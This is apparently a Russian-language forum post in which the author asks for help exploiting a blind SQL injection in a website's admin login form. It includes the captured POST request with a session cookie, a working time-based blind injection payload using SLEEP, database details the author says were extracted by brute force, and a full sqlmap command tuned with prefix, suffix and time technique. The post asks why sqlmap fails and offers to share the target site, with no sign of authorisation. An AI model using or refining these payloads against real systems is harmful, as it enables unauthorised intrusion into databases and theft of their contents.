Подскажите Blind SQL Injection
POST /admin/login/ HTTP/1.1
Cache-Control: no-cache
Referer:
https://site.com/admin/login/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634
Host: site.com
Accept-Encoding: gzip, deflate
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
username=&password=&login=Login
уязвимы оба параметра username,password
'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'
перебором вытащила
VERSION 5.5.47-MariaDB
DB site_com
USER site_com
Sqlmap POST parameter 'username' is not injectable POST parameter 'password' is not injectable
sqlmap.py -u
https://site.com/admin/login/ --data="username=&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" -v 3 -p username --dbs --prefix="'+" --suffix="+'" --technique=T
Пробовала уже по всякому ,Sqlmap не может найти Inj
Что я делаю не так?
могу скинуть сайт, если подскажете